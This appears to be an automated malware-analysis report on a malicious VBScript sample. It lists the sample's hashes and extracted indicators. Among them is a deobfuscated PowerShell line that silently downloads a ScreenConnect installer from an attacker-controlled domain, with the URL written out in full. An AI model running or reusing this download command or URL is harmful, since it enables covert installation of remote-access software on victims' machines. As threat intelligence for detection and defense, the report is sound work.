Malicious

ad0c043d74f5216aabd9b7a6320d3596

VBScript
|
MD5: ad0c043d74f5216aabd9b7a6320d3596
|
Size: 2.15 KB
|
text/vbscript

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	ad0c043d74f5216aabd9b7a6320d3596
Sha1	deccab6215c588b453ace937a4319e3da9e183db
Sha256	ec6069de8aadd7f83d0d251c51c00ff009a0e3bfd8b4a0b19e269f08e15ce9b2
Sha384	c42d612863e7815c211f2237f851e72a672dfc052d9afa8adf5c0f8f9928db0e198bdaf69e0019154c230225e6fc47df
Sha512	2629b9d2f1167f2cf60663ce8523d8199cdf5749b97d353831311830699f37a192410cffab5396e244d7ef45bb7a491c4f364dada5839dd9716d6ef64b12f5df
SSDeep	48:HMqmXt/0mDIn7i/YZrOIzf/jUn/1eC/xZ28WHAz:KHo7i/YJRD/jUn/1Z/728qm
TLSH	5E41211FBE0AB270983257B68A66DC1DD8D05863242A5C94B58CC4C28F3037DFA945FA

File Structure

Artefacts

Name0	Value
URLs in VB Code - #1	https://app.yeanizssike.icu/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
Deobfuscated PowerShell	"$ProgressPreference='SilentlyContinue';Invoke-WebRequest -Uri 'https://app.yeanizssike.icu/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile '"

ad0c043d74f5216aabd9b7a6320d3596 (2.15 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
URLs in VB Code - #1	https://app.yeanizssike.icu/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest	ad0c043d74f5216aabd9b7a6320d3596
Deobfuscated PowerShell	"$ProgressPreference='SilentlyContinue';Invoke-WebRequest -Uri 'https://app.yeanizssike.icu/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile '" Malicious	ad0c043d74f5216aabd9b7a6320d3596 > ad0c043d74f5216aabd9b7a6320d3596.deobfuscated.vbs > [Command #0] > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙